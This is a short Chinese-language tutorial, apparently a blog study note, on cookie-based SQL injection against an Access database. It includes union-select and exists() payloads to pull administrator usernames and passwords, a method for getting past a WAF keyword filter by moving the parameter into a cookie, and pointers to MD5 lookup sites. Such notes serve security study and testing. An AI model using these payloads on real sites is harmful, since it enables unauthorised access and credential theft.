一、cookie 注入
绕过waf(防火墙)拿到管理员账号及密码。
1、access联合注入
2、cookie注入
3、md5加密
猜测的表名:user、admin
?id=191 union select 1,2,3,4,5,6,7,8,9,10 from admin
access数据库union查询后,优先显示后表查询出的内容
刚好和mysql显示顺序相反,语法也限制更大(access查询语法要求加表名)
探测表名:exists()
?id=191 and exists(select * from admin)
?id=191 and exists(select username,password from admin)
收集常见的用户表名称、字段名称
非法传参拦截:
?id=191 and 1=1
报错为【说明进行了特殊过滤/处理】:
请不要在参数中出现: and update delete;insert mid master等非法字符!
提交数据大多时候是get\post方式,有时可能使用cookie提交,并对get\post进行了拦截
判断是否可以通过cookie进行传参
id=171+order+by+10
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
id=171+union+select+1,2,3,4,5,6,username,password,9,10+from+admin
删除参数报错后,火狐浏览器f12,点击存储,在cookie下新增一行,key、value(id、171)
插件:
火狐浏览器 --》附加组件--》搜索cookie或ModHeader【几乎都可以用】
如ModHeader:
——cookie自动补全才有效,value改成id=171
——打钩表示使用
——cookie里面的空格要使用+号来代替
md5:字母+数字的结合16位或32位,md5就是文本处理,所谓的md5破解就是撞库
如:https://www.cmd5.com
https://www.somd5.com
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)